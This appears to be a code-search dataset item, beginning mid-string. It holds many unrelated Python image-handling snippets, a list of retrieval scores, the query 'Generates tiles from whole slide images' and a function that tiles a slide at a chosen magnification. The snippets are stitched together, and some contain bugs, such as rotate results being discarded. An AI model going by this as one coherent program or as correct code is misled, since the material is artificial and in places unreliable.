aspect_ration2\n image = Image.new('RGB', (int(h2 * aspect_ratio1), int(h2)))\n k = h2 / h1 # compression ratio\n w = int(h2 * aspect_ratio1) # band length\n i, j, n = 0, 1, round(0.5 + self.imheight / self.__band_width)\n while i < self.imheight:\n print('\\rOpening image: {j} from {n}'.format(j=j, n=n), end='')\n band = min(self.__band_width, self.imheight - i) # width of the tile band\n self.__tile[1][3] = band # set band width\n self.__tile[2] = self.__offset + self.imwidth * i * 3 # tile offset (3 bytes per pixel)\n self.__image.close()\n self.__image = Image.open(self.path) # reopen / reset image\n self.__image.size = (self.imwidth, band) # set size of the tile band\n self.__image.tile = [self.__tile] # set tile\n cropped = self.__image.crop((0, 0, self.imwidth, band)) # crop tile band\n image.paste(cropped.resize((w, int(band * k) + 1), self.__filter), (0, int(i * k)))\n i += band\n j += 1\n print('\\r' + 30 * ' ' + '\\r', end='') # hide printed string\n return image", "def admin_photo(self, obj=None, size='default'):\n self = obj if obj else self\n if hasattr(self, 'get_thumbnail_url'):\n return '<a class=\"thumb-'+size+'\" href=\"{}\"><img src=\"{}\"></a>'.format(\n self.admin_url, self.get_thumbnail_url(size))", "def imgesprint(self,path,align='center'):\n self.dps.set(align=align)\n self.dps.image(path)", "def plot_photometric_accuracy(cat_name,name_plot,plot):\n\n cat=ascii.read('%s.txt' % cat_name)\n mask = cat['detected']==1\n \n import matplotlib.pyplot as plt\n x=np.linspace(min(cat[mask]['MAG']),max(cat[mask]['MAG']),1000)\n plt.clf()\n plt.xlim(int(min(cat[mask]['MAG']))-1,np.ceil(max(cat[mask]['MAG']))+1)\n plt.ylim(int(min(cat[mask]['MAG']))-1,np.ceil(max(cat[mask]['MAG']))+1)\n plt.xticks(np.arange(int(min(cat[mask]['MAG']))-1,int(np.ceil(max(cat[mask]['MAG'])))+1))\n \n plt.yticks(np.arange(int(min(cat[mask]['MAG']))-1,int(np.ceil(max(cat[mask]['MAG'])))+1))\n plt.scatter(cat[mask]['MAG'],cat[mask]['mag_det'])\n plt.plot(x,x,color='red',ls='--')\n plt.xlabel('Input Magnitude (AB)')\n plt.ylabel('Extracted magnitude (AB)')\n plt.grid(True)\n plt.savefig('results/plots/%s.png' % name_plot)\n if plot: plt.show()", "def map_picture(the_map, p):\n xy = (p.location[0] - 2, p.location[1] + 2)\n map_coords = []\n for y in range(0, 5):\n row = [(xy[0] + x, xy[1] - y) for x in range(0, 5)]\n map_coords.append(row)\n\n pretty_map = []\n for r in map_coords:\n row = []\n for coordinates in r:\n if coordinates in the_map.keys():\n if p.quest and p.job and p.quest[1] == coordinates and p.job.location == coordinates:\n star = '*$ '\n elif p.quest and p.quest[1] == coordinates:\n star = ' * '\n elif p.job and p.job.location == coordinates:\n star = ' $ '\n else:\n star = ' '\n row.append(\"|{!s:9}{}|\".format(the_map[coordinates].square_type, star))\n else:\n row.append(\"|{!s:12}|\".format(' '))\n pretty_map.append(row)\n for row in pretty_map:\n print(''.join(row))", "def generate_thumbnail(self, img_path):\n\n thumb_path = self.thumbnail_path(img_path)\n dirpath = os.path.dirname(thumb_path)\n try:\n os.makedirs(dirpath)\n except OSError: # path exists\n pass\n\n cmd = [\n '/usr/local/bin/gm',\n 'convert',\n '-thumbnail', '256x256>',\n '-background', 'transparent',\n '-gravity', 'center',\n '-extent', '256x256',\n img_path, thumb_path\n ]\n\n retcode = subprocess.call(cmd)\n\n if retcode:\n log.error('convert exited with %d : %s', retcode, img_path)\n return False\n\n log.debug('Wrote thumbnail for `%s` to `%s`.', img_path, thumb_path)\n\n return True", "def _repr_png_(self):\n 
mol = self.owner.mol\n keku = IPythonConsole.kekulizeStructures\n size = IPythonConsole.molSize\n opts = IPythonConsole.drawOptions\n return Draw._moltoimg(\n mol, size, self.aix, \"\", returnPNG=True, drawOptions=opts,\n kekulize=keku, highlightBonds=self.bix\n )", "def _repr_png_(self):\n mol = self.owner.mol\n keku = IPythonConsole.kekulizeStructures\n size = IPythonConsole.molSize\n opts = IPythonConsole.drawOptions\n return Draw._moltoimg(\n mol, size, self.aix, \"\", returnPNG=True, drawOptions=opts,\n kekulize=keku, highlightBonds=self.bix\n )", "def map_sim_property(**kwargs):\n\n GR = glo.global_results()\n\n p = copy.copy(params)\n for key,val in kwargs.items():\n setattr(p,key,val)\n\n counter = 0\n fignum = 1\n if p.gal_index == 'all':\n\n for gal_index in GR.N_gal - np.arange(GR.N_gal) - 1:\n\n if counter == 0:\n fig, axes = plt.subplots(3, 3, figsize=(20,15))\n axs = [axes[0,0],axes[0,1],axes[0,2],axes[1,0],axes[1,1],axes[1,2],axes[2,0],axes[2,1],axes[2,2]]\n counter = 9\n\n gal_ob = gal.galaxy(GR=GR, gal_index=gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type='simgas')\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * simgas.m.sum()/np.sum(map2D) \n\n # Plot\n Rmax = max_scale/2\n ax1 = axs[9 - counter]\n if p.log:\n map2D[map2D < 10.**p.vmin] = 10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n if not p.log:\n map2D[map2D < p.vmin] = p.vmin/2\n map2D[map2D > p.vmax] = p.vmax\n im = ax1.imshow(map2D,\\\n extent=[-Rmax,Rmax,-Rmax,Rmax],vmin=p.vmin,cmap=p.cmap)\n fig.colorbar(im,shrink=0.8,ax=ax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n # Limit axes limits a bit to avoid area with no particles...\n ax1.set_xlim([-0.99*Rmax,0.99*Rmax])\n ax1.set_ylim([-0.99*Rmax,0.99*Rmax])\n if (p.prop == 'm') & (p.text == True):\n ax1.text(0.05,0.85,'M$_{gas}$=%.2eM$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.75,'SFR=%.2eM$_{\\odot}$/yr' % GR.SFR[gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n\n counter -= 1\n\n #if counter == 0:\n # ax1 = plt.subplots(1, 1)\n #cbar = fig.colorbar(im, ax=axes.ravel().tolist(), shrink=0.95, label=lab)\n # fig.colorbar(im,shrink=0.8,label=lab)\n\n if counter == 0 or gal_index == GR.N_gal-1:\n print('Saving in ' + p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format))\n # plt.tight_layout()\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/')\n plt.savefig(p.d_plot + 'sim_data/map_%s_%s_gals_%i.%s' % (p.prop,p.z1,fignum,p.format), format=p.format, dpi=250, facecolor='w')\n fignum += 1\n\n else:\n if p.add:\n fig, ax1 = plt.gcf(), p.ax\n if not p.add:\n fig = plt.figure(figsize=(8,6))\n ax1 = fig.add_axes([0.1, 0.01, 0.8, 0.8]) \n ax1.axis('equal')\n\n gal_ob = gal.galaxy(GR=GR, gal_index=p.gal_index)\n simgas = aux.load_temp_file(gal_ob=gal_ob,data_type=p.sim_type)\n if p.R_max:\n # Cut out square\n simgas = simgas[(np.abs(simgas.x) < p.R_max) & (np.abs(simgas.y) < p.R_max)]\n # Add bottom left corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = -p.R_max,-p.R_max\n extra_row[p.prop] = 0\n simgas = simgas.append(extra_row).reset_index(drop=True) \n # Add top right corner\n extra_row = simgas.iloc[0] # to ensure that map gets the right size\n extra_row['x'],extra_row['y'] = p.R_max,p.R_max\n extra_row[p.prop] = 0\n simgas = 
simgas.append(extra_row).reset_index(drop=True) \n else:\n pass\n map2D,lab,max_scale = make_projection_map(simgas,prop=p.prop)\n if p.prop == 'm': map2D = map2D * simgas.m.sum()/np.sum(map2D) \n print('Min and max of map: ',map2D.min(),map2D.max())\n #map2D[map2D < 1e4] = 1e6\n # Plot map\n if not p.R_max:\n p.R_max = max_scale/2\n if p.log: \n if not p.vmax: p.vmax = np.log10(map2D).max()\n if not p.vmin: p.vmin = np.log10(map2D).max() - 4\n map2D[map2D < 10.**p.vmin] = 10.**p.vmin/2\n map2D[map2D > 10.**p.vmax] = 10.**p.vmax\n map2D = np.log10(map2D)\n else:\n if not p.vmax: p.vmax = np.max(map2D)\n if not p.vmin: p.vmin = np.min(map2D) / 1e3\n map2D[map2D < p.vmin] = p.vmin #np.min(map2D[map2D > 0])\n map2D = np.flipud(map2D)\n\n im = ax1.imshow(map2D,\\\n extent=[-max_scale/2,max_scale/2,-max_scale/2,max_scale/2],vmin=p.vmin,vmax=p.vmax,cmap=p.cmap)\n # Limit axes limits a bit to avoid area with no particles...\n zoom = 1#/1.5\n ax1.set_xlim([-1/zoom * p.R_max,1/zoom * p.R_max])\n ax1.set_ylim([-1/zoom * p.R_max,1/zoom * p.R_max])\n if p.colorbar: \n divider = make_axes_locatable(ax1)\n cax1 = divider.append_axes(\"right\", size=\"5%\", pad=0.05)\n fig.colorbar(im,cax=cax1,label=lab)\n if not p.add: ax1.set_xlabel('x [kpc]'); ax1.set_ylabel('y [kpc]')\n if (p.prop == 'm') & (p.text == True):\n simstar = aux.load_temp_file(gal_ob=gal_ob,data_type='simstar')\n ax1.text(0.05,0.92,'M$_{star}$=%.1e M$_{\\odot}$' % np.sum(simstar.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.86,'M$_{gas}$=%.1e M$_{\\odot}$' % np.sum(simgas.m),\\\n fontsize=14,transform=ax1.transAxes,color='white')\n ax1.text(0.05,0.80,'SFR=%.2f M$_{\\odot}$/yr' % GR.SFR[p.gal_index],\\\n fontsize=14,transform=ax1.transAxes,color='white')\n if p.savefig:\n if not os.path.isdir(p.d_plot + 'sim_data/'): os.mkdir(p.d_plot + 'sim_data/') \n plt.savefig(p.d_plot + 'sim_data/map_%s_G%i.png' % (p.prop,p.gal_index), format=p.format, dpi=250, facecolor='w')\n\n if not p.colorbar: return(im)", "def fRes(self, mag, size, ps):\n x = 2 * np.pi * mag / (size[0] * ps[0])\n y = 2 * np.pi * mag / (size[1] * ps[1])\n return [x, y]", "def image(self):\n\n # image dimension ...\n # margin + DPI * double radius * mm to cm to inch\n size = int(data.Export.MARGIN + data.Export.DPI * 2 * self.radius * 0.1 / 2.54)\n\n x = size / 2\n y = size / 2\n\n # scaling to the DPI\n r = data.Export.DPI * self.radius * .1 / 2.54\n i = data.Export.DPI * self.inner_radius * .1 / 2.54\n\n image = Image.new(\"RGBA\", (size, size))\n\n draw = ImageDraw.Draw(image)\n draw.ellipse((x-r, y-r, x+r, y+r), fill=(0,0,0,255))\n draw.ellipse((x-i, y-i, x+i, y+i), fill=(0,0,0,0))\n return image", "def RescaleScreenShot(bmp, thumbnail_size=200):\r\n\r\n bmpW, bmpH = bmp.GetWidth(), bmp.GetHeight()\r\n img = bmp.ConvertToImage()\r\n\r\n newW, newH = bmpW, bmpH\r\n \r\n if bmpW > bmpH:\r\n if bmpW > thumbnail_size:\r\n ratio = bmpW/float(thumbnail_size)\r\n newW, newH = int(bmpW/ratio), int(bmpH/ratio)\r\n img.Rescale(newW, newH, wx.IMAGE_QUALITY_HIGH)\r\n else:\r\n if bmpH > thumbnail_size:\r\n ratio = bmpH/float(thumbnail_size)\r\n newW, newH = int(bmpW/ratio), int(bmpH/ratio)\r\n img.Rescale(newW, newH, wx.IMAGE_QUALITY_HIGH)\r\n\r\n newBmp = img.ConvertToBitmap()\r\n otherBmp = wx.EmptyBitmap(newW+5, newH+5) \r\n\r\n memDC = wx.MemoryDC()\r\n memDC.SelectObject(otherBmp)\r\n memDC.SetBackground(wx.WHITE_BRUSH)\r\n memDC.Clear()\r\n \r\n memDC.SetPen(wx.TRANSPARENT_PEN)\r\n\r\n pos = 0\r\n for i in xrange(5, 0, -1):\r\n brush = 
wx.Brush(wx.Colour(50*i, 50*i, 50*i))\r\n memDC.SetBrush(brush)\r\n memDC.DrawRoundedRectangle(0, 0, newW+5-pos, newH+5-pos, 2)\r\n pos += 1\r\n\r\n memDC.DrawBitmap(newBmp, 0, 0, True)\r\n \r\n # Select the Bitmap out of the memory DC by selecting a new\r\n # uninitialized Bitmap\r\n memDC.SelectObject(wx.NullBitmap)\r\n\r\n return otherBmp", "def thumbnail(im, config):\n\n im.thumbnail(\n (config['width'], config['height']),\n ANTIALIAS,\n )\n\n return im", "def processImage(picture_data, target_dir):\n img = Image.open(picture_data)\n exif = img._getexif()\n if exif is not None:\n for tag, value in exif.items():\n decoded = TAGS.get(tag, tag)\n if decoded == \"Orientation\":\n if value == 3:\n img = img.rotate(180)\n if value == 6:\n img.rotate(270)\n if value == 8:\n img.rotate(90)\n break\n img = maxSize(img, (1024, 768), Image.ANTIALIAS)\n # generate a random 8-byte (i.e. 16-character string)\n random_hex = secrets.token_hex(8)\n # split the filename to get the extension\n _, f_ext = os.path.split(picture_data.filename)\n # generate the new filename\n new_filename = random_hex + f_ext\n # calculate the full path to save the file, and save it\n path_to_save = os.path.join(current_app.root_path, target_dir, new_filename)\n # thumbs directory\n thumbs_dir = os.path.join(current_app.root_path, target_dir, \"thumbs\")\n if not os.path.exists(thumbs_dir):\n os.mkdir(thumbs_dir)\n img.save(path_to_save, \"JPEG\", quality=100)\n img.thumbnail((300, 300))\n img.save(os.path.join(thumbs_dir, new_filename))\n\n return new_filename", "def Rescale(self):\r\n picWidth,picHeight = self.oldSize = self.GetSizeTuple()\r\n bitmap = self.scaled = self.bitmap\r\n if not bitmap: return\r\n imgWidth,imgHeight = bitmap.GetWidth(),bitmap.GetHeight()\r\n if self.scaling == 2 or (self.scaling == 1 and (imgWidth > picWidth or imgHeight > picHeight)):\r\n image = bitmap.ConvertToImage()\r\n factor = min(1.0*picWidth/imgWidth,1.0*picHeight/imgHeight)\r\n newWidth,newHeight = int(factor*imgWidth),int(factor*imgHeight)\r\n self.scaled = image.Scale(newWidth,newHeight).ConvertToBitmap()\r\n #self.scaled = image.Scale(newWidth,newHeight,wx.IMAGE_QUALITY_HIGH ).ConvertToBitmap()\r", "def create_thumbnail(self, target, format=None):", "def showimage(image):\n mplt.figure()\n mplt.imshow(image)\n mplt.show()", "def Cutout(img: Image, magnitude: float) -> Image:\n if magnitude == 0.0:\n return img\n w, h = img.size\n xy = get_rand_bbox_coord(w//2, h//2, magnitude)\n\n img = img.copy()\n PIL.ImageDraw.Draw(img).rectangle(xy, fill=FILLCOLOR)\n return img", "def resizeImage(self):\n ratio = float(self.qIma.width()) / float(self.qIma.height())\n if self.qIma.width() > self.qIma.height():\n maxWidth = 300\n maxHeight = int(300 / ratio)\n else:\n maxWidth = int(300 / ratio)\n maxHeight = 300\n img = self.qIma.toImage().scaled(maxWidth, maxHeight, QtCore.Qt.KeepAspectRatio)\n return img", "def create_full_pic(self):\n self.create_half_pic()\n mirror_update(self.flag)", "def generate_image(self, imagename, antenna='', cellsize='8arcmin', npix=512, niter=0, threshold='0Jy', weighting='uniform', start=200, stop=900, uvlength=0, uvsign='>', phasecenter='', gridmode='', wprojplanes=1024, script='clean', del_script=True):\n ct.imaging(self.ms, imagename, antenna=antenna, cellsize=cellsize, npix=npix, niter=niter, threshold=threshold, weighting=weighting, start=start, stop=stop, uvlength=uvlength, uvsign=uvsign, phasecenter=phasecenter, gridmode=gridmode, wprojplanes=wprojplanes, script=script, delete=del_script)", "def 
get_image_size(self):", "def lensedImage(self, source, scale, xl=8., yl=4., gamma=0.):\n image, magMap = lens(self.ltype, self.dist, source, self.x01, self.x02, xl, yl, gamma)\n\n return image, magMap", "def image_preview(self):\r\n h = '<img src=\"%s\" alt=\"%s\"/>' % (self.image_resized_url, self.title)\r\n return mark_safe(h)", "def show_image(im, rescale=False) :\r\n \r\n plt.figure()\r\n im = im.copy()\r\n im.resize(*LFW_IMAGESIZE)\r\n if rescale :\r\n plt.imshow(im.astype(float), cmap=plt.cm.get_cmap(\"gray\"))\r\n else :\r\n plt.imshow(im.astype(float), cmap=plt.cm.get_cmap(\"gray\"), vmin=0, vmax=255)\r\n plt.axis('off')\r\n plt.show()", "def build_filler_images(self):", "def view(self):\n plt.imshow(self.texture_array, vmin = 0, vmax = 255)\n if self.texture_array.ndim == 2:\n plt.set_cmap('gray')\n \n plt.title(self.texture_name)\n plt.show()", "def logosmall(self):\n try:\n asset = self.app.module_map.uploader.get(self.barcamp.logo)\n except AssetNotFound:\n asset = None\n if not asset:\n return u\"\"\n v = asset.variants['medium_user']\n url = self.app.url_for(\"asset\", asset_id = v._id)\n return \"\"\"<a href=\"%s\"><img src=\"%s\" width=\"%s\" height=\"%s\"></a>\"\"\" %(\n self.handler.url_for(\"barcamps.index\", slug = self.barcamp.slug),\n url,\n v.metadata['width'],\n v.metadata['height'])", "def _image(self):\n print(\"imaging\")\n self.images.append(self.device_control.image())\n yield", "def plot_thumb(self, data_fname):\n thumbnail = self.controller.plot_thumb(data_fname, self.bitmap_width, self.bitmap_height)\n if thumbnail is not None:\n self.figure_bmp.SetBitmap(thumbnail)\n else:\n self.plot_blank()", "def do_icon(srcfn, magnitude):\n img = Image.open(\"%s.png\" % (srcfn, ))\n draw = ImageDraw.Draw(img)\n (width, _height) = FONT.getsize(magnitude)\n # 40 pixel wide, we want to center it\n x0 = int(20 - (width / 2.))\n draw.text((x0, 8), magnitude, font=FONT, fill=(0, 0, 0, 255))\n img.save((\"../../htdocs/icons/lsr/%s/%s.png\"\n ) % (srcfn, magnitude))\n del img\n del draw", "def extract_single(self, sub_h, sub_w, zoom_min=2, zoom_max=4, margin=10, write_path=None):\n\n k = np.random.randint(0, len(self.collection.short_fnames))\n\n name = self.collection.short_fnames[k]\n bg = self.collection.imgs[k]\n big_h, big_w, _ = bg.shape\n\n zoomed_h, zoomed_w = self._zoom(sub_h, sub_w, zoom_min, zoom_max)\n\n if 'fs' in name:\n # print('fs bg')\n zoomed_h = sub_h\n zoomed_w = sub_w\n\n circumscribe_radius = np.ceil(np.sqrt(zoomed_h ** 2 + zoomed_w ** 2))\n circumscribe_radius = int(circumscribe_radius) + margin\n\n cen_x = np.random.randint(circumscribe_radius, big_w - circumscribe_radius)\n cen_y = np.random.randint(circumscribe_radius, big_h - circumscribe_radius)\n\n x1 = int(cen_x - circumscribe_radius / 2)\n y1 = int(cen_y - circumscribe_radius / 2)\n\n x2 = int(cen_x + circumscribe_radius / 2)\n y2 = int(cen_y + circumscribe_radius / 2)\n\n raw_crop = bg[y1:y2, x1:x2]\n # cv2.imshow('raw crop',raw_crop)\n\n rotated = self._rotate(raw_crop, zoomed_h, zoomed_w)\n rotated = cv2.resize(rotated, (sub_w, sub_h))\n\n img = self._bg_augmentation(rotated)\n # cv2.imshow('rotated',rotated)\n # print(rotated.shape)\n\n if write_path is not None:\n cv2.imwrite(write_path, img)\n return img", "def setImageDimensions(*args):", "def coral_image_resize(im, scaling_method, scaling_factor, height_cm):\n\n if scaling_method == 'scale':\n scale = float(scaling_factor) # here scaling_factor is the desired image scaling.\n elif scaling_method == 'ratio':\n scale = float(scaling_factor) 
* height_cm / im.shape[0] # here scaling_factor is the desited px_cm_ratio.\n im = scipy.misc.imresize(im, scale)\n return (im, scale)", "def magick(inp, out):\n\n subprocess.call([\"magick\", inp, out], shell=os.name == \"nt\")", "def magick(inp, out):\n\n subprocess.call([\"magick\", inp, out], shell=os.name == \"nt\")", "def draw(self, prof, image, method, offset, config, base, logger, **kwargs):\n # ... draw prof onto the given image (making a new Image if necessary)\n if prof is None:\n return image\n else:\n logger = galsim.config.LoggerWrapper(logger)\n # Setup the kwargs to pass to drawImage\n # (Start with any additional kwargs given as extra kwargs to DrawBasic and add to it.)\n kwargs['image'] = image\n kwargs['offset'] = offset\n kwargs['method'] = method\n if 'wmult' in config and 'wmult' not in kwargs: # pragma: no cover\n kwargs['wmult'] = galsim.config.ParseValue(config, 'wmult', base, float)[0]\n if 'wcs' not in kwargs and 'scale' not in kwargs:\n kwargs['wcs'] = base['wcs'].local(image_pos = base['image_pos'])\n if method == 'phot' and 'rng' not in kwargs:\n kwargs['rng'] = galsim.config.GetRNG(config, base, logger, \"method='phot'\")\n\n # Check validity of extra phot options:\n max_extra_noise = None\n if 'n_photons' in config and 'n_photons' not in kwargs:\n if method != 'phot':\n raise AttributeError('n_photons is invalid with method != phot')\n if 'max_extra_noise' in config:\n logger.warning(\n \"Both 'max_extra_noise' and 'n_photons' are set in config dict, \"+\n \"ignoring 'max_extra_noise'.\")\n kwargs['n_photons'] = galsim.config.ParseValue(config, 'n_photons', base, int)[0]\n elif 'max_extra_noise' in config:\n max_extra_noise = galsim.config.ParseValue(config, 'max_extra_noise', base, float)[0]\n if method != 'phot' and max_extra_noise is not None:\n raise AttributeError('max_extra_noise is invalid with method != phot')\n\n if 'poisson_flux' in config and 'poisson_flux' not in kwargs:\n if method != 'phot':\n raise AttributeError('poisson_flux is invalid with method != phot')\n kwargs['poisson_flux'] = galsim.config.ParseValue(config, 'poisson_flux', base, bool)[0]\n\n if max_extra_noise is not None and 'max_extra_noise' not in kwargs:\n if max_extra_noise < 0.:\n raise ValueError(\"image.max_extra_noise cannot be negative\")\n if 'image' in base and 'noise' in base['image']:\n noise_var = galsim.config.CalculateNoiseVariance(base)\n else:\n raise AttributeError(\"Need to specify noise level when using max_extra_noise\")\n if noise_var < 0.:\n raise ValueError(\"noise_var calculated to be < 0.\")\n max_extra_noise *= noise_var\n kwargs['max_extra_noise'] = max_extra_noise\n\n if logger.isEnabledFor(logging.DEBUG):\n # Don't output the full image array. 
Use str(image) for that kwarg.\n alt_kwargs = dict([(k,str(kwargs[k]) if isinstance(kwargs[k],galsim.Image) else kwargs[k])\n for k in kwargs])\n logger.debug('obj %d: drawImage kwargs = %s',base.get('obj_num',0), alt_kwargs)\n logger.debug('obj %d: prof = %s',base.get('obj_num',0),prof)\n try:\n # NOTE: Old version:\n # image = prof.drawImage(**kwargs)\n if isinstance(prof, galsim.GSObject):\n image = prof.drawImage(**kwargs)\n elif isinstance(prof, galsim.ChromaticObject):\n bp = {}\n for key in (self._req_bp_fields+self._opt_bp_fields):\n try:\n bp[key] = config['bandpass'][key]\n except KeyError:\n bp[key] = None\n\n bandpass = galsim.Bandpass(blue_limit=bp['blue_limit'], red_limit=bp['red_limit'],\n wave_type=bp['wave_type'], throughput=bp['throughput'],\n zeropoint=bp['zeropoint'])\n\n image = prof.drawImage(bandpass=bandpass, **kwargs)\n\n except Exception as e: # pragma: no cover\n logger.debug('obj %d: prof = %r', base.get('obj_num',0), prof)\n raise\n return image", "def write(fname, face, min_=0, max_=255):\n image = face.reshape(IMG_HEIGHT, IMG_WIDTH)\n res = plt.matshow(image, cmap='gray', vmin=min_, vmax=max_)\n res.axes.get_xaxis().set_visible(False)\n res.axes.get_yaxis().set_visible(False)\n plt.axis(\"off\")\n plt.savefig(fname, bbox_inches=\"tight\")", "def photometry(self, ZP, ifilter, radius=3., show=False, outfile=None):\n\n # Init\n if self.segm is None:\n raise ValueError(\"segm not set!\")\n if self.hdu is None:\n self.load_image()\n\n # Zero point\n if isinstance(ZP, str):\n ZP = self.header[ZP]\n\n self.cat = photutils.source_properties(self.hdu.data - self.bkg.background,\n self.segm,\n kron_params=('mask', 2.5, 1.0, 'exact', 5),\n background=self.bkg.background,\n filter_kernel=self.kernel)\n\n # Apertures\n apertures = []\n for obj in self.cat:\n position = np.transpose((obj.xcentroid.value, obj.ycentroid.value))\n a = obj.semimajor_axis_sigma.value * radius\n b = obj.semiminor_axis_sigma.value * radius\n theta = obj.orientation.to(units.rad).value\n apertures.append(photutils.EllipticalAperture(position, a, b, theta=theta))\n self.apertures = apertures\n\n # Magnitudes\n self.filter = ifilter\n self.photom = self.cat.to_table().to_pandas()\n self.photom[ifilter] = -2.5 * np.log10(self.photom['source_sum']) + ZP\n\n # Kron\n for key in ['kron_radius']:\n self.photom[key] = getattr(self.cat, key)\n\n # Plot?\n if show or outfile is not None:\n norm = ImageNormalize(stretch=SqrtStretch())\n fig = plt.figure(figsize=(6, 6))\n\n # fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(10, 12.5))\n plt.clf()\n ax1 = plt.gca()\n ax1.imshow(self.hdu.data, origin='lower', cmap='Greys_r', norm=norm)\n ax1.set_title('Data')\n #\n for aperture in apertures:\n aperture.plot(axes=ax1, color='white', lw=1.5)\n if outfile is not None: # This must come first\n plt.savefig(outfile, dpi=300)\n if show:\n plt.show()", "def _print_image(self, line, size):\n i = 0\n cont = 0\n\n self._write(self.__class__.__imageSize['1x1'])\n buffer = bytearray([int((size[0] / size[1]) / 8), 0, size[1], 0])\n\n self._write(buffer)\n buffer = bytearray()\n\n while i < len(line):\n hex_string = int(line[i:i + 8], 2)\n buffer.append(hex_string)\n i += 8\n cont += 1\n if cont % 4 == 0:\n self._write(buffer)\n buffer = bytearray()\n cont = 0", "def disImg(data=None,colorbar=False):\n size = np.sqrt(len(data[4:]))\n xmm = data[0]\n ymm = data[1]\n pl.matshow(data[4:].reshape(size,size),fignum=False)\n if colorbar == True:\n pl.colorbar()\n pl.xlim(0,size-1)\n pl.ylim(0,size-1)\n pl.xlabel('Pixels')\n 
pl.ylabel('Pixels')\n pl.grid(color='yellow')", "def on_image(self, image):", "def thumbnail(self, item):\n if self._has_image_field(item) and self._field_is_visible('image'):\n tile_conf = self.get_tile_configuration()\n image_conf = tile_conf.get('image', None)\n if image_conf:\n scaleconf = image_conf['imgsize']\n # Scale string is something like: 'mini 200:200'.\n # We need the name only: 'mini'.\n scale = scaleconf.split(' ')[0]\n scales = ploneapi.content.get(path='@@images')\n return scales.scale('image', scale)", "def adjust(self, image):\n ...", "def generate_image( now ):\n cmd = \"csh mwplot.csh %s\" % (\n now.strftime(\"%Y %m %d %H %M\"),)\n subprocess.call(cmd, shell=True)", "def display(self):\n display(self.image)", "def run_image_viewer( self ):\n\n # XXX: hardcoded program name and image size.\n subprocess.Popen( [\"feh\", \"-dZ\", \"-g\", \"800x600\", self.record[\"filename\"]] )", "def printImage(imageObject):\n # TODO\n pass", "def show_image(file_location):\n img = Image.open(file_location)\n img.show()", "def make_big_e(self):\n l = self.l_i\n self.img[l/2-1:l/2+1, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2-3, l/2-5:l/2+5] = 1\n self.img[l/2+3:l/2+5, l/2-5:l/2+5] = 1\n self.img[l/2-5:l/2+5, l/2-5:l/2-3] = 1\n self.img_name = 'bigE'", "def get_thumbnail_path(examfile):\n h = examfile.hash\n thumb = os.path.join(settings.MEDIA_ROOT, \"cache\", h + \".png\")\n if os.path.exists(thumb):\n return thumb\n path = os.path.join(settings.MEDIA_ROOT, examfile.path.path)\n cmd = \"/usr/local/bin/mudraw -o %s -h 800 -w 600 '%s' 1\" % (thumb, path)\n args = shlex.split(cmd.encode(\"utf8\"))\n mudraw = subprocess.Popen(args)\n mudraw.wait()\n return thumb", "def FlyResize( image, log_mess, nimages, method = Image.ANTIALIAS ):\n oldw, oldh = image.size\n resl = [8, 10, 14, 16, 20, 22, 24, 32, 40, 48, 64, 96, 128, 256]\n \n if oldw > 256 or oldh > 256:\n newsiz = min(resl, key = lambda x:abs(x - max(oldw, oldh)))\n image.thumbnail((newsiz, newsiz), method)\n neww, newh = image.size\n log_mess += ' and new size scaled = %s x %s' %(neww, newh)\n elif nimages > 1:\n log_mess += ' and size = %s x %s' %(oldw, oldh)\n \n return oldw, oldh, image, log_mess" ]
[ "0.60173213", "0.5782513", "0.5777427", "0.5764191", "0.56933355", "0.56771076", "0.56483626", "0.5612517", "0.5609735", "0.56014514", "0.5599658", "0.55762804", "0.55341315", "0.55226684", "0.5477635", "0.5477049", "0.546813", "0.54632145", "0.54585576", "0.54283446", "0.538394", "0.5378996", "0.5364472", "0.53544694", "0.5351772", "0.5351307", "0.5337051", "0.5331377", "0.53030133", "0.52952546", "0.52938133", "0.52873105", "0.52844024", "0.52760565", "0.5274738", "0.5262607", "0.52600974", "0.5258317", "0.5257417", "0.525401", "0.52484196", "0.52472216", "0.5243544", "0.5237566", "0.5232085", "0.52292854", "0.5217103", "0.52108175", "0.51886094", "0.51778203", "0.5174832", "0.51715744", "0.51317376", "0.5124422", "0.5121878", "0.5119942", "0.5119942", "0.51158214", "0.51096123", "0.5095431", "0.50937515", "0.5093581", "0.5091502", "0.5082471", "0.5075035", "0.5072997", "0.5065018", "0.5055042", "0.5046445", "0.50443405", "0.50441897", "0.50411206", "0.5037271", "0.503554", "0.5031915", "0.50298345", "0.5029529", "0.50269485", "0.5024524", "0.5023434", "0.5018181", "0.50172234", "0.500898", "0.5000002", "0.5000002", "0.49999103", "0.49975145", "0.49968353", "0.4992059", "0.49910575", "0.49902743", "0.49877796", "0.49857852", "0.4985447", "0.49835876", "0.49780378", "0.49776936", "0.4976623", "0.49755245", "0.49752876", "0.49750602" ]
0.0
-1
Generates tiles from whole slide images
def tile_gen_at_mag(wsi, mag, tile_size):

    #Get size of WSI at Level 0 (Max Magnification)
    x0, y0 = wsi.level_dimensions[0]

    #Get size of WSI at the mag we want
    x_mag, y_mag = get_size_for_mag(wsi, mag)

    x_tiles = int(np.floor(x_mag/tile_size))
    y_tiles = int(np.floor(y_mag/tile_size))

    #Scale tile size accordingly
    scale = highest_mag(wsi)/mag

    yield (x_tiles, y_tiles)

    tiles = []
    for y in range(y_tiles):
        for x in range(x_tiles):
            x_coord = round(x*scale*tile_size)
            y_coord = round(y*scale*tile_size)
            scaled_tile_size = round(scale*tile_size)
            tile = wsi.read_region((x_coord, y_coord), 0, (scaled_tile_size, scaled_tile_size))

            yield tile.resize((tile_size, tile_size), resample = Image.BICUBIC)
